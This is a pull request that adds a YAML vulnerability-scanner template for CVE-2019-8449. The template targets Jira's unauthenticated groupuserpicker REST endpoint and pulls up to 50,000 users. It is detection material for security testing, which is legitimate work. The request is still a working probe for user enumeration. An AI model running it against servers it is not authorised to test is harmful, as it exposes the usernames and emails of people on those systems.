### PR TITLE
Create CVE-2019-8449.yaml

### DIFF
--- a/cves/CVE-2019-8449.yaml
+++ b/cves/CVE-2019-8449.yaml
@@ -1,0 +1,22 @@
+id: CVE-2019-8449
+
+info:
+  name: JIRA Unauthenticated Sensitive Information Disclosure
+  author: Harsh Bothra
+  severity: medium
+
+# source:- https://www.doyler.net/security-not-included/more-jira-enumeration
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true'
+            
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        words:
+          - "users"
+        part: body


### PR DESCRIPTION
CVE-2019-8449 which allows an Unauthenticated Attacker to enumerate all the users and their information such as Username, Avatars, Emails, Keys, etc.
Reference - https://www.doyler.net/security-not-included/more-jira-enumeration